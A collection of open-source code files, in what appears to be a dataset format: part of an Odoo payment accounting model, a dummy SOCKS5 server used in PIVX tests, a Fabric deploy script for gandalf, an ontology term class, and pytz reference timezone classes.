payment_method_code = fields.Char(
related='payment_method_id.code',
help="Technical field used to adapt the interface to the payment type selected.")
show_partner_bank_account = fields.Boolean(
compute='_compute_show_require_partner_bank',
help="Technical field used to know whether the field `partner_bank_id` needs to be displayed or not in the payments form views")
require_partner_bank_account = fields.Boolean(
compute='_compute_show_require_partner_bank',
help="Technical field used to know whether the field `partner_bank_id` needs to be required or not in the payments form views")
country_code = fields.Char(related='company_id.country_id.code')
_sql_constraints = [
(
'check_amount_not_negative',
'CHECK(amount >= 0.0)',
"The payment amount cannot be negative.",
),
]
# -------------------------------------------------------------------------
# HELPERS
# -------------------------------------------------------------------------
def _seek_for_lines(self):
''' Helper used to dispatch the journal items between:
- The lines using the temporary liquidity account.
- The lines using the counterpart account.
- The lines being the write-off lines.
:return: (liquidity_lines, counterpart_lines, writeoff_lines)
'''
self.ensure_one()
liquidity_lines = self.env['account.move.line']
counterpart_lines = self.env['account.move.line']
writeoff_lines = self.env['account.move.line']
for line in self.move_id.line_ids:
if line.account_id in (
self.journal_id.default_account_id,
self.journal_id.payment_debit_account_id,
self.journal_id.payment_credit_account_id,
):
liquidity_lines += line
elif line.account_id.internal_type in ('receivable', 'payable') or line.partner_id == line.company_id.partner_id:
counterpart_lines += line
else:
writeoff_lines += line
return liquidity_lines, counterpart_lines, writeoff_lines
def _prepare_move_line_default_vals(self, write_off_line_vals=None):
''' Prepare the dictionary to create the default account.move.lines for the current payment.
:param write_off_line_vals: Optional dictionary to create a write-off account.move.line easily containing:
* amount: The amount to be added to the counterpart amount.
* name: The label to set on the line.
* account_id: The account on which create the write-off.
:return: A list of python dictionary to be passed to the account.move.line's 'create' method.
'''
self.ensure_one()
write_off_line_vals = write_off_line_vals or {}
if not self.journal_id.payment_debit_account_id or not self.journal_id.payment_credit_account_id:
raise UserError(_(
"You can't create a new payment without an outstanding payments/receipts account set on the %s journal.",
self.journal_id.display_name))
# Compute amounts.
write_off_amount = write_off_line_vals.get('amount', 0.0)
if self.payment_type == 'inbound':
# Receive money.
counterpart_amount = -self.amount
write_off_amount *= -1
elif self.payment_type == 'outbound':
# Send money.
counterpart_amount = self.amount
else:
counterpart_amount = 0.0
write_off_amount = 0.0
balance = self.currency_id._convert(counterpart_amount, self.company_id.currency_id, self.company_id, self.date)
counterpart_amount_currency = counterpart_amount
write_off_balance = self.currency_id._convert(write_off_amount, self.company_id.currency_id, self.company_id, self.date)
write_off_amount_currency = write_off_amount
currency_id = self.currency_id.id
if self.is_internal_transfer:
if self.payment_type == 'inbound':
liquidity_line_name = _('Transfer to %s', self.journal_id.name)
else: # payment.payment_type == 'outbound':
liquidity_line_name = _('Transfer from %s', self.journal_id.name)
else:
liquidity_line_name = self.payment_reference
# Compute a default label to set on the journal items.
payment_display_name = {
'outbound-customer': _("Customer Reimbursement"),
'inbound-customer': _("Customer Payment"),
'outbound-supplier': _("Vendor Payment"),
'inbound-supplier': _("Vendor Reimbursement"),
}
default_line_name = self.env['account.move.line']._get_default_line_name(
_("Internal Transfer") if self.is_internal_transfer else payment_display_name['%s-%s' % (self.payment_type, self.partner_type)],
self.amount,
self.currency_id,
self.date,
partner=self.partner_id,
)
line_vals_list = [
# Liquidity line.
{
'name': liquidity_line_name or default_line_name,
'date_maturity': self.date,
'amount_currency': -counterpart_amount_currency,
'currency_id': currency_id,
'debit': balance < 0.0 and -balance or 0.0,
'credit': balance > 0.0 and balance or 0.0,
'partner_id': self.partner_id.id,
'account_id': self.journal_id.payment_debit_account_id.id if balance < 0.0 else self.journal_id.payment_credit_account_id.id,
},
# Receivable / Payable.
{
'name': self.payment_reference or default_line_name,
'date_maturity': self.date,
'amount_currency': counterpart_amount_currency + write_off_amount_currency if currency_id else 0.0,
'currency_id': currency_id,
'debit': balance + write_off_balance > 0.0 and balance + write_off_balance or 0.0,
'credit': balance + write_off_balance < 0.0 and -balance - write_off_balance or 0.0,
'partner_id': self.partner_id.id,
'account_id': self.destination_account_id.id,
},
]
if write_off_balance:
# Write-off line.
line_vals_list.append({
'name': write_off_line_vals.get('name') or default_line_name,
'amount_currency': -write_off_amount_currency,
'currency_id': currency_id,
'debit': write_off_balance < 0.0 and -write_off_balance or 0.0,
'credit': write_off_balance > 0.0 and write_off_balance or 0.0,
'partner_id': self.partner_id.id,
'account_id': write_off_line_vals.get('account_id'),
})
return line_vals_list
# -------------------------------------------------------------------------
# COMPUTE METHODS
# -------------------------------------------------------------------------
@api.depends('move_id.line_ids.amount_residual', 'move_id.line_ids.amount_residual_currency', 'move_id.line_ids.account_id')
def _compute_reconciliation_status(self):
''' Compute the field indicating if the payments are already reconciled with something.
This field is used for display purpose (e.g. display the 'reconcile' button redirecting to the reconciliation
widget).
'''
for pay in self:
liquidity_lines, counterpart_lines, writeoff_lines = pay._seek_for_lines()
if not pay.currency_id or not pay.id:
pay.is_reconciled = False
pay.is_matched = False
elif pay.currency_id.is_zero(pay.amount):
pay.is_reconciled = True
pay.is_matched = True
else:
residual_field = 'amount_residual' if pay.currency_id == pay.company_id.currency_id else 'amount_residual_currency'
if pay.journal_id.default_account_id and pay.journal_id.default_account_id in liquidity_lines.account_id:
# Allow user managing payments without any statement lines by using the bank account directly.
# In that case, the user manages transactions only using the register payment wizard.
pay.is_matched = True
else:
pay.is_matched = pay.currency_id.is_zero(sum(liquidity_lines.mapped(residual_field)))
reconcile_lines = (counterpart_lines + writeoff_lines).filtered(lambda line: line.account_id.reconcile)
pay.is_reconciled = pay.currency_id.is_zero(sum(reconcile_lines.mapped(residual_field)))
@api.model
def _get_method_codes_using_bank_account(self):
return ['manual']
@api.model
def _get_method_codes_needing_bank_account(self):
return []
@api.depends('payment_method_code')
def _compute_show_require_partner_bank(self):
""" Computes if the destination bank account must be displayed in the payment form view. By default, it
won't be displayed but some modules might change that, depending on the payment type."""
for payment in self:
payment.show_partner_bank_account = payment.payment_method_code in self._get_method_codes_using_bank_account()
payment.require_partner_bank_account = payment.state == 'draft' and payment.payment_method_code in self._get_method_codes_needing_bank_account()
@api.depends('partner_id')
def _compute_partner_bank_id(self):
''' The default partner_bank_id will be the first available on the partner. '''
for pay in self:
available_partner_bank_accounts = pay.partner_id.bank_ids.filtered(lambda x: x.company_id in (False, pay.company_id))
if available_partner_bank_accounts:
pay.partner_bank_id = available_partner_bank_accounts[0]._origin
else:
pay.partner_bank_id = False
@api.depends('partner_id', 'destination_account_id', 'journal_id')
def _compute_is_internal_transfer(self):
for payment in self:
is_partner_ok = payment.partner_id == payment.journal_id.company_id.partner_id
is_account_ok = payment.destination_account_id and payment.destination_account_id == payment.journal_id.company_id.transfer_account_id
payment.is_internal_transfer = is_partner_ok and is_account_ok
@api.depends('payment_type', 'journal_id')
def _compute_payment_method_id(self):
''' Compute the 'payment_method_id' field.
This field is not computed in '_compute_payment_method_fields' because it's a stored editable one.
'''
for pay in self:
if pay.payment_type == 'inbound':
available_payment_methods = pay.journal_id.inbound_payment_method_ids
else:
available_payment_methods = pay.journal_id.outbound_payment_method_ids
# Select the first available one by default.
if available_payment_methods:
pay.payment_method_id = available_payment_methods[0]._origin
else:
pay.payment_method_id = False
@api.depends('payment_type',
'journal_id.inbound_payment_method_ids',
'journal_id.outbound_payment_method_ids')
def _compute_payment_method_fields(self):
for pay in self:
if pay.payment_type == 'inbound':
pay.available_payment_method_ids = pay.journal_id.inbound_payment_method_ids
else:
pay.available_payment_method_ids = pay.journal_id.outbound_payment_method_ids
pay.hide_payment_method = len(pay.available_payment_method_ids) == 1 and pay.available_payment_method_ids.code == 'manual'
@api.depends('journal_id')
def _compute_currency_id(self):
for pay in self:
pay.currency_id = pay.journal_id.currency_id or pay.journal_id.company_id.currency_id
@api.depends('is_internal_transfer')
def _compute_partner_id(self):
for pay in self:
if pay.is_internal_transfer:
pay.partner_id = pay.journal_id.company_id.partner_id
elif pay.partner_id == pay.journal_id.company_id.partner_id:
pay.partner_id = False
else:
pay.partner_id = pay.partner_id
@api.depends('journal_id', 'partner_id', 'partner_type', 'is_internal_transfer')
def _compute_destination_account_id(self):
self.destination_account_id = False
for pay in self:
if pay.is_internal_transfer:
pay.destination_account_id = pay.journal_id.company_id.transfer_account_id
elif pay.partner_type == 'customer':
# Receive money from invoice or send money to refund it.
if pay.partner_id:
pay.destination_account_id = pay.partner_id.with_company(pay.company_id).property_account_receivable_id
else:
pay.destination_account_id = self.env['account.account'].search([
('company_id', '=', pay.company_id.id),
('internal_type', '=', 'receivable'),
], limit=1)
elif pay.partner_type == 'supplier':
# Send money to pay a bill or receive money to refund it.
if pay.partner_id:
pay.destination_account_id = pay.partner_id.with_company(pay.company_id).property_account_payable_id
else:
pay.destination_account_id = self.env['account.account'].search([
('company_id', '=', pay.company_id.id),
('internal_type', '=', 'payable'),
], limit=1)
@api.depends('partner_bank_id', 'amount', 'ref', 'currency_id', 'journal_id', 'move_id.state',
'payment_method_id', 'payment_type')
def _compute_qr_code(self):
for pay in self:
if pay.state in ('draft', 'posted') \
and pay.partner_bank_id \
and pay.payment_method_id.code == 'manual' \
and pay.payment_type == 'outbound' \
and pay.currency_id:
if pay.partner_bank_id:
qr_code = pay.partner_bank_id.build_qr_code_url(pay.amount, pay.ref, pay.ref, pay.currency_id, pay.partner_id)
else:
qr_code = None
if qr_code:
pay.qr_code = '''
<br/>
<img class="border border-dark rounded" src="{qr_code}"/>
<br/>
<strong class="text-center">{txt}</strong>
'''.format(txt = _('Scan me with your banking app.'),
qr_code = qr_code)
continue
pay.qr_code = None
@api.depends('move_id.line_ids.matched_debit_ids', 'move_id.line_ids.matched_credit_ids')
def _compute_stat_buttons_from_reconciliation(self):
''' Retrieve the invoices reconciled to the payments through the reconciliation (account.partial.reconcile). '''
stored_payments = self.filtered('id')
if not stored_payments:
self.reconciled_invoice_ids = False
self.reconciled_invoices_count = 0
self.reconciled_bill_ids = False
self.reconciled_bills_count = 0
self.reconciled_statement_ids = False
self.reconciled_statements_count = 0
return
self.env['account.move'].flush()
self.env['account.move.line'].flush()
self.env['account.partial.reconcile'].flush()
self._cr.execute('''
SELECT
payment.id,
ARRAY_AGG(DISTINCT invoice.id) AS invoice_ids,
invoice.move_type
FROM account_payment payment
JOIN account_move move ON move.id = payment.move_id
JOIN account_move_line line ON line.move_id = move.id
JOIN account_partial_reconcile part ON
part.debit_move_id = line.id
OR
part.credit_move_id = line.id
JOIN account_move_line counterpart_line ON
part.debit_move_id = counterpart_line.id
OR
part.credit_move_id = counterpart_line.id
JOIN account_move invoice ON invoice.id = counterpart_line.move_id
JOIN account_account account ON account.id = line.account_id
WHERE account.internal_type IN ('receivable', 'payable')
AND payment.id IN %(payment_ids)s
AND line.id != counterpart_line.id
AND invoice.move_type in ('out_invoice', 'out_refund', 'in_invoice', 'in_refund', 'out_receipt', 'in_receipt')
GROUP BY payment.id, invoice.move_type
''', {
'payment_ids': tuple(stored_payments.ids)
})
query_res = self._cr.dictfetchall()
self.reconciled_invoice_ids = self.reconciled_invoices_count = False
self.reconciled_bill_ids = self.reconciled_bills_count = False
for res in query_res:
pay = self.browse(res['id'])
if res['move_type'] in self.env['account.move'].get_sale_types(True):
pay.reconciled_invoice_ids += self.env['account.move'].browse(res.get('invoice_ids', []))
pay.reconciled_invoices_count = len(res.get('invoice_ids', []))
else:
pay.reconciled_bill_ids += self.env['account.move'].browse(res.get('invoice_ids', []))
pay.reconciled_bills_count = len(res.get('invoice_ids', []))
self._cr.execute('''
SELECT
payment.id,
ARRAY_AGG(DISTINCT counterpart_line.statement_id) AS statement_ids
FROM account_payment payment
JOIN account_move move ON move.id = payment.move_id
JOIN account_journal journal ON journal.id = move.journal_id
JOIN account_move_line line ON line.move_id = move.id
JOIN account_account account ON account.id = line.account_id
JOIN account_partial_reconcile part ON
part.debit_move_id = line.id
OR
part.credit_move_id = line.id
JOIN account_move_line counterpart_line ON
part.debit_move_id = counterpart_line.id
OR
part.credit_move_id = counterpart_line.id
WHERE (account.id = journal.payment_debit_account_id OR account.id = journal.payment_credit_account_id)
AND payment.id IN %(payment_ids)s
AND line.id != counterpart_line.id
AND counterpart_line.statement_id IS NOT NULL
GROUP BY payment.id
''', {
'payment_ids': tuple(stored_payments.ids)
})
query_res = dict((payment_id, statement_ids) for payment_id, statement_ids in self._cr.fetchall())
for pay in self:
statement_ids = query_res.get(pay.id, [])
pay.reconciled_statement_ids = [(6, 0, statement_ids)]
pay.reconciled_statements_count = len(statement_ids)
# -------------------------------------------------------------------------
# ONCHANGE METHODS
# -------------------------------------------------------------------------
@api.onchange('posted_before', 'state', 'journal_id', 'date')
def _onchange_journal_date(self):
# Before the record is created, the move_id doesn't exist yet, and the name will not be
# recomputed correctly if we change the journal or the date, leading to inconsitencies
if not self.move_id:
self.name = False
# -------------------------------------------------------------------------
# CONSTRAINT METHODS
# -------------------------------------------------------------------------
@api.constrains('payment_method_id')
def _check_payment_method_id(self):
''' Ensure the 'payment_method_id' field is not null.
Can't be done using the regular 'required=True' because the field is a computed editable stored one.
'''
for pay in self:
if not pay.payment_method_id:
raise ValidationError(_("Please define a payment method on your payment."))
# -------------------------------------------------------------------------
# LOW-LEVEL METHODS
# -------------------------------------------------------------------------
@api.model_create_multi
def create(self, vals_list):
# OVERRIDE
write_off_line_vals_list = []
for vals in vals_list:
# Hack to add a custom write-off line.
write_off_line_vals_list.append(vals.pop('write_off_line_vals', None))
# Force the move_type to avoid inconsistency with residual 'default_move_type' inside the context.
vals['move_type'] = 'entry'
# Force the computation of 'journal_id' since this field is set on account.move but must have the
# bank/cash type.
if 'journal_id' not in vals:
vals['journal_id'] = self._get_default_journal().id
# Since 'currency_id' is a computed editable field, it will be computed later.
# Prevent the account.move to call the _get_default_currency method that could raise
# the 'Please define an accounting miscellaneous journal in your company' error.
if 'currency_id' not in vals:
journal = self.env['account.journal'].browse(vals['journal_id'])
vals['currency_id'] = journal.currency_id.id or journal.company_id.currency_id.id
payments = super().create(vals_list)
for i, pay in enumerate(payments):
write_off_line_vals = write_off_line_vals_list[i]
# Write payment_id on the journal entry plus the fields being stored in both models but having the same
# name, e.g. partner_bank_id. The ORM is currently not able to perform such synchronization and make things
# more difficult by creating related fields on the fly to handle the _inherits.
# Then, when partner_bank_id is in vals, the key is consumed by account.payment but is never written on
# account.move.
to_write = {'payment_id': pay.id}
for k, v in vals_list[i].items():
if k in self._fields and self._fields[k].store and k in pay.move_id._fields and pay.move_id._fields[k].store:
to_write[k] = v
if 'line_ids' not in vals_list[i]:
to_write['line_ids'] = [(0, 0, line_vals) for line_vals in pay._prepare_move_line_default_vals(write_off_line_vals=write_off_line_vals)]
pay.move_id.write(to_write)
return payments
def write(self, vals):
# OVERRIDE
res = super().write(vals)
self._synchronize_to_moves(set(vals.keys()))
return res
def unlink(self):
# OVERRIDE to unlink the inherited account.move (move_id field) as well.
moves = self.with_context(force_delete=True).move_id
res = super().unlink()
moves.unlink()
return res
@api.depends('move_id.name')
def name_get(self):
return [(payment.id, payment.move_id.name or _('Draft Payment')) for payment in self]
# -------------------------------------------------------------------------
# SYNCHRONIZATION account.payment <-> account.move
# -------------------------------------------------------------------------
def _synchronize_from_moves(self, changed_fields):
''' Update the account.payment regarding its related account.move.
Also, check both models are still consistent.
:param changed_fields: A set containing all modified fields on account.move.
'''
if self._context.get('skip_account_move_synchronization'):
return
for pay in self.with_context(skip_account_move_synchronization=True):
# After the migration to 14.0, the journal entry could be shared between the account.payment and the
# account.bank.statement.line. In that case, the synchronization will only be made with the statement line.
if pay.move_id.statement_line_id:
continue
move = pay.move_id
move_vals_to_write = {}
payment_vals_to_write = {}
if 'journal_id' in changed_fields:
if pay.journal_id.type not in ('bank', 'cash'):
raise UserError(_("A payment must always belongs to a bank or cash journal."))
if 'line_ids' in changed_fields:
all_lines = move.line_ids
liquidity_lines, counterpart_lines, writeoff_lines = pay._seek_for_lines()
if len(liquidity_lines) != 1 or len(counterpart_lines) != 1:
raise UserError(_(
"The journal entry %s reached an invalid state relative to its payment.\n"
"To be consistent, the journal entry must always contains:\n"
"- one journal item involving the outstanding payment/receipts account.\n"
"- one journal item involving a receivable/payable account.\n"
"- optional journal items, all sharing the same account.\n\n"
) % move.display_name)
if writeoff_lines and len(writeoff_lines.account_id) != 1:
raise UserError(_(
"The journal entry %s reached an invalid state relative to its payment.\n"
"To be consistent, all the write-off journal items must share the same account."
) % move.display_name)
if any(line.currency_id != all_lines[0].currency_id for line in all_lines):
raise UserError(_(
"The journal entry %s reached an invalid state relative to its payment.\n"
"To be consistent, the journal items must share the same currency."
) % move.display_name)
if any(line.partner_id != all_lines[0].partner_id for line in all_lines):
raise UserError(_(
"The journal entry %s reached an invalid state relative to its payment.\n"
"To be consistent, the journal items must share the same partner."
) % move.display_name)
if counterpart_lines.account_id.user_type_id.type == 'receivable':
partner_type = 'customer'
else:
partner_type = 'supplier'
liquidity_amount = liquidity_lines.amount_currency
move_vals_to_write.update({
'currency_id': liquidity_lines.currency_id.id,
'partner_id': liquidity_lines.partner_id.id,
})
payment_vals_to_write.update({
'amount': abs(liquidity_amount),
'payment_type': 'inbound' if liquidity_amount > 0.0 else 'outbound',
'partner_type': partner_type,
'currency_id': liquidity_lines.currency_id.id,
'destination_account_id': counterpart_lines.account_id.id,
'partner_id': liquidity_lines.partner_id.id,
})
move.write(move._cleanup_write_orm_values(move, move_vals_to_write))
pay.write(move._cleanup_write_orm_values(pay, payment_vals_to_write))
def _synchronize_to_moves(self, changed_fields):
''' Update the account.move regarding the modified account.payment.
:param changed_fields: A list containing all modified fields on account.payment.
'''
if self._context.get('skip_account_move_synchronization'):
return
if not any(field_name in changed_fields for field_name in (
'date', 'amount', 'payment_type', 'partner_type', 'payment_reference', 'is_internal_transfer',
'currency_id', 'partner_id', 'destination_account_id', 'partner_bank_id',
)):
return
for pay in self.with_context(skip_account_move_synchronization=True):
liquidity_lines, counterpart_lines, writeoff_lines = pay._seek_for_lines()
# Make sure to preserve the write-off amount.
# This allows to create a new payment with custom 'line_ids'.
if writeoff_lines:
writeoff_amount = sum(writeoff_lines.mapped('amount_currency'))
counterpart_amount = counterpart_lines['amount_currency']
if writeoff_amount > 0.0 and counterpart_amount > 0.0:
sign = 1
else:
sign = -1
write_off_line_vals = {
'name': writeoff_lines[0].name,
'amount': writeoff_amount * sign,
'account_id': writeoff_lines[0].account_id.id,
}
else:
write_off_line_vals = {}
line_vals_list = pay._prepare_move_line_default_vals(write_off_line_vals=write_off_line_vals)
line_ids_commands = [
(1, liquidity_lines.id, line_vals_list[0]),
(1, counterpart_lines.id, line_vals_list[1]),
]
for line in writeoff_lines:
line_ids_commands.append((2, line.id))
if writeoff_lines:
line_ids_commands.append((0, 0, line_vals_list[2]))
# Update the existing journal items.
# If dealing with multiple write-off lines, they are dropped and a new one is generated.
pay.move_id.write({
'partner_id': pay.partner_id.id,
'currency_id': pay.currency_id.id,
'partner_bank_id': pay.partner_bank_id.id,
'line_ids': line_ids_commands,
})
# -------------------------------------------------------------------------
# BUSINESS METHODS
# -------------------------------------------------------------------------
def mark_as_sent(self):
self.write({'is_move_sent': True})
def unmark_as_sent(self):
self.write({'is_move_sent': False})
def action_post(self):
''' draft -> posted '''
self.move_id._post(soft=False)
def action_cancel(self):
''' draft -> cancelled '''
self.move_id.button_cancel()
def action_draft(self):
''' posted -> draft '''
self.move_id.button_draft()
def button_open_invoices(self):
''' Redirect the user to the invoice(s) paid by this payment.
:return: An action on account.move.
'''
self.ensure_one()
action = {
'name': _("Paid Invoices"),
'type': 'ir.actions.act_window',
'res_model': 'account.move',
'context': {'create': False},
}
if len(self.reconciled_invoice_ids) == 1:
action.update({
'view_mode': 'form',
'res_id': self.reconciled_invoice_ids.id,
})
else:
action.update({
'view_mode': 'list,form',
'domain': [('id', 'in', self.reconciled_invoice_ids.ids)],
})
return action
def button_open_bills(self):
''' Redirect the user to the bill(s) paid by this payment.
:return: An action on account.move.
'''
self.ensure_one()
action = {
'name': _("Paid Bills"),
'type': 'ir.actions.act_window',
'res_model': 'account.move',
'context': {'create': False},
}
if len(self.reconciled_bill_ids) == 1:
action.update({
'view_mode': 'form',
'res_id': self.reconciled_bill_ids.id,
})
else:
action.update({
'view_mode': 'list,form',
'domain': [('id', 'in', self.reconciled_bill_ids.ids)],
})
return action
def button_open_statements(self):
''' Redirect the user to the statement line(s) reconciled to this payment.
:return: An action on account.move.
'''
self.ensure_one()
action = {
'name': _("Matched Statements"),
'type': 'ir.actions.act_window',
'res_model': 'account.bank.statement',
'context': {'create': False},
}
if len(self.reconciled_statement_ids) == 1:
action.update({
'view_mode': 'form',
'res_id': self.reconciled_statement_ids.id,
})
else:
action.update({
'view_mode': 'list,form',
'domain': [('id', 'in', self.reconciled_statement_ids.ids)],
})
return action
| agpl-3.0 |
PIVX-Project/PIVX | test/functional/test_framework/socks5.py | 9 | 5684 | #!/usr/bin/env python3
# Copyright (c) 2015-2017 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Dummy Socks5 server for testing."""
import socket, threading, queue
import logging
logger = logging.getLogger("TestFramework.socks5")
### Protocol constants
class Command:
CONNECT = 0x01
class AddressType:
IPV4 = 0x01
DOMAINNAME = 0x03
IPV6 = 0x04
### Utility functions
def recvall(s, n):
"""Receive n bytes from a socket, or fail."""
rv = bytearray()
while n > 0:
d = s.recv(n)
if not d:
raise IOError('Unexpected end of stream')
rv.extend(d)
n -= len(d)
return rv
### Implementation classes
class Socks5Configuration():
"""Proxy configuration."""
def __init__(self):
self.addr = None # Bind address (must be set)
self.af = socket.AF_INET # Bind address family
self.unauth = False # Support unauthenticated
self.auth = False # Support authentication
class Socks5Command():
"""Information about an incoming socks5 command."""
def __init__(self, cmd, atyp, addr, port, username, password):
self.cmd = cmd # Command (one of Command.*)
self.atyp = atyp # Address type (one of AddressType.*)
self.addr = addr # Address
self.port = port # Port to connect to
self.username = username
self.password = password
def __repr__(self):
return 'Socks5Command(%s,%s,%s,%s,%s,%s)' % (self.cmd, self.atyp, self.addr, self.port, self.username, self.password)
class Socks5Connection():
def __init__(self, serv, conn, peer):
self.serv = serv
self.conn = conn
self.peer = peer
def handle(self):
"""Handle socks5 request according to RFC192."""
try:
# Verify socks version
ver = recvall(self.conn, 1)[0]
if ver != 0x05:
raise IOError('Invalid socks version %i' % ver)
# Choose authentication method
nmethods = recvall(self.conn, 1)[0]
methods = bytearray(recvall(self.conn, nmethods))
method = None
if 0x02 in methods and self.serv.conf.auth:
method = 0x02 # username/password
elif 0x00 in methods and self.serv.conf.unauth:
method = 0x00 # unauthenticated
if method is None:
raise IOError('No supported authentication method was offered')
# Send response
self.conn.sendall(bytearray([0x05, method]))
# Read authentication (optional)
username = None
password = None
if method == 0x02:
ver = recvall(self.conn, 1)[0]
if ver != 0x01:
raise IOError('Invalid auth packet version %i' % ver)
ulen = recvall(self.conn, 1)[0]
username = str(recvall(self.conn, ulen))
plen = recvall(self.conn, 1)[0]
password = str(recvall(self.conn, plen))
# Send authentication response
self.conn.sendall(bytearray([0x01, 0x00]))
# Read connect request
ver, cmd, _, atyp = recvall(self.conn, 4)
if ver != 0x05:
raise IOError('Invalid socks version %i in connect request' % ver)
if cmd != Command.CONNECT:
raise IOError('Unhandled command %i in connect request' % cmd)
if atyp == AddressType.IPV4:
addr = recvall(self.conn, 4)
elif atyp == AddressType.DOMAINNAME:
n = recvall(self.conn, 1)[0]
addr = recvall(self.conn, n)
elif atyp == AddressType.IPV6:
addr = recvall(self.conn, 16)
else:
raise IOError('Unknown address type %i' % atyp)
port_hi,port_lo = recvall(self.conn, 2)
port = (port_hi << 8) | port_lo
# Send dummy response
self.conn.sendall(bytearray([0x05, 0x00, 0x00, 0x01, 0x00, 0x00, 0x00, 0x00, 0x00, 0x00]))
cmdin = Socks5Command(cmd, atyp, addr, port, username, password)
self.serv.queue.put(cmdin)
logger.info('Proxy: %s', cmdin)
# Fall through to disconnect
except Exception as e:
logger.exception("socks5 request handling failed.")
self.serv.queue.put(e)
finally:
self.conn.close()
class Socks5Server():
def __init__(self, conf):
self.conf = conf
self.s = socket.socket(conf.af)
self.s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
self.s.bind(conf.addr)
self.s.listen(5)
self.running = False
self.thread = None
self.queue = queue.Queue() # report connections and exceptions to client
def run(self):
while self.running:
(sockconn, peer) = self.s.accept()
if self.running:
conn = Socks5Connection(self, sockconn, peer)
thread = threading.Thread(None, conn.handle)
thread.daemon = True
thread.start()
def start(self):
assert(not self.running)
self.running = True
self.thread = threading.Thread(None, self.run)
self.thread.daemon = True
self.thread.start()
def stop(self):
self.running = False
# connect to self to end run loop
s = socket.socket(self.conf.af)
s.connect(self.conf.addr)
s.close()
self.thread.join()
| mit |
scorphus/gandalf | fabfile.py | 7 | 1221 | # -*- coding: utf-8 -*-
# Copyright 2012 gandalf authors. All rights reserved.
# Use of this source code is governed by a BSD-style
# license that can be found in the LICENSE file.
import os
from fabric.api import abort, cd, env, local, put, run
current_dir = os.path.abspath(os.path.dirname(__file__))
env.user = 'git'
env.gandalf_path = '/home/%s/gandalf' % env.user
def build():
goos = local("go env GOOS", capture=True)
goarch = local("go env GOARCH", capture=True)
if goos != "linux" or goarch != "amd64":
abort("gandalf must be built on linux_amd64 for deployment, you're on %s_%s" % (goos, goarch))
local("mkdir -p dist")
local("go clean ./...")
local("go build -a -o dist/gandalf-webserver ./webserver")
local("go build -a -o dist/gandalf ./bin")
def clean():
local("rm -rf dist")
local("rm -f dist.tar.gz")
def send():
local("tar -czf dist.tar.gz dist")
run("mkdir -p %(gandalf_path)s" % env)
put(os.path.join(current_dir, "dist.tar.gz"), env.gandalf_path)
def restart():
with cd(env.gandalf_path):
run("tar -xzf dist.tar.gz")
run("circusctl restart gandalf-web")
def deploy():
build()
send()
restart()
clean()
| bsd-3-clause |
JaneliaSciComp/Neuroptikon | Source/library/ontology_term.py | 1 | 2276 | # Copyright (c) 2010 Howard Hughes Medical Institute.
# All rights reserved.
# Use is subject to Janelia Farm Research Campus Software Copyright 1.1 license terms.
# http://license.janelia.org/license/jfrc_copyright_1_1.html
class OntologyTerm(object):
def __init__(self, ontology, oboStanza = None, *args, **keywordArgs):
object.__init__(self, *args, **keywordArgs)
self.ontology = ontology
self.oboStanza = oboStanza
self.identifier = None
self.name = None
self.abbreviation = None
self.partOf = None
self.parts = []
self.obsolete = False
if self.oboStanza is not None:
self.identifier = self.oboStanza.tags['id'][0].value
self.name = self.oboStanza.tags['name'][0].value
# If this term has 'part-of' relationship then try to set the parent term.
if 'relationship' in self.oboStanza.tags:
relationship = self.oboStanza.tags['relationship'][0]
if relationship.value.startswith('part_of '):
parentId = relationship.value[8:]
if parentId in self.ontology:
parentTerm = self.ontology[parentId]
self.partOf = parentTerm
parentTerm.parts.append(self)
else:
# The parent of this term has not been loaded yet. Store its ID and look it up later.
self.partOf = parentId
# Grab any abbreviation.
if 'synonym' in self.oboStanza.tags:
synonym = self.oboStanza.tags['synonym'][0]
for modifier in synonym.modifiers or ():
if 'ABBREVIATION' in modifier:
self.abbreviation = synonym.value
break
# TODO: grab other synonyms?
if 'def' in self.oboStanza.tags:
if self.oboStanza.tags['def'][0].value == 'obsolete':
self.obsolete = True
def browse(self):
# Make sure the ontology is open
self.ontology.browse()
self.ontology.frame.selectTerm(self)
| bsd-3-clause |
subutai/nupic | external/linux32/lib/python2.6/site-packages/pytz/reference.py | 839 | 3649 | '''
Reference tzinfo implementations from the Python docs.
Used for testing against as they are only correct for the years
1987 to 2006. Do not use these for real code.
'''
from datetime import tzinfo, timedelta, datetime
from pytz import utc, UTC, HOUR, ZERO
# A class building tzinfo objects for fixed-offset time zones.
# Note that FixedOffset(0, "UTC") is a different way to build a
# UTC tzinfo object.
class FixedOffset(tzinfo):
"""Fixed offset in minutes east from UTC."""
def __init__(self, offset, name):
self.__offset = timedelta(minutes = offset)
self.__name = name
def utcoffset(self, dt):
return self.__offset
def tzname(self, dt):
return self.__name
def dst(self, dt):
return ZERO
# A class capturing the platform's idea of local time.
import time as _time
STDOFFSET = timedelta(seconds = -_time.timezone)
if _time.daylight:
DSTOFFSET = timedelta(seconds = -_time.altzone)
else:
DSTOFFSET = STDOFFSET
DSTDIFF = DSTOFFSET - STDOFFSET
class LocalTimezone(tzinfo):
def utcoffset(self, dt):
if self._isdst(dt):
return DSTOFFSET
else:
return STDOFFSET
def dst(self, dt):
if self._isdst(dt):
return DSTDIFF
else:
return ZERO
def tzname(self, dt):
return _time.tzname[self._isdst(dt)]
def _isdst(self, dt):
tt = (dt.year, dt.month, dt.day,
dt.hour, dt.minute, dt.second,
dt.weekday(), 0, -1)
stamp = _time.mktime(tt)
tt = _time.localtime(stamp)
return tt.tm_isdst > 0
Local = LocalTimezone()
# A complete implementation of current DST rules for major US time zones.
def first_sunday_on_or_after(dt):
days_to_go = 6 - dt.weekday()
if days_to_go:
dt += timedelta(days_to_go)
return dt
# In the US, DST starts at 2am (standard time) on the first Sunday in April.
DSTSTART = datetime(1, 4, 1, 2)
# and ends at 2am (DST time; 1am standard time) on the last Sunday of Oct.
# which is the first Sunday on or after Oct 25.
DSTEND = datetime(1, 10, 25, 1)
class USTimeZone(tzinfo):
def __init__(self, hours, reprname, stdname, dstname):
self.stdoffset = timedelta(hours=hours)
self.reprname = reprname
self.stdname = stdname
self.dstname = dstname
def __repr__(self):
return self.reprname
def tzname(self, dt):
if self.dst(dt):
return self.dstname
else:
return self.stdname
def utcoffset(self, dt):
return self.stdoffset + self.dst(dt)
def dst(self, dt):
if dt is None or dt.tzinfo is None:
# An exception may be sensible here, in one or both cases.
# It depends on how you want to treat them. The default
# fromutc() implementation (called by the default astimezone()
# implementation) passes a datetime with dt.tzinfo is self.
return ZERO
